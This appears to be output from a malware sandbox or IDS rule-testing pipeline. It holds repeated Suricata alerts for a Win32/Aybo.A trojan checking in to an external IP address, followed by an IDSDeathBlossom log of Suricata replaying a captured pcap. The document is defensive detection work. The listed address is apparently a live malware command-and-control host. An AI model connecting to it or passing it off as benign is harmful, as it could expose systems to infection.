05/03/2017-18:43:11.079844  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:43:31.148676  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:43:51.217586  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:44:11.386560  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:44:31.455417  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80

2019-11-22 13:16:52,744 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-11-22 13:16:53,469 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-11-22 13:16:53,469 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-11-22 13:16:53,470 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-11-22 13:16:53,470 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-11-22 13:16:53,470 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/bc723fab22ff6f9155158c04712f3dbe56b33745cb75ec8c950e11a498e082d2 -r /var/pcap/11222019.1316-75eabd849a48ce317345ba33dfe57943800a1e0e37f64d6e162759b3334180a9_network.pcap -vvv -k none
2019-11-22 13:17:20,402 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-11-22 13:17:20,403 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 27.6669590473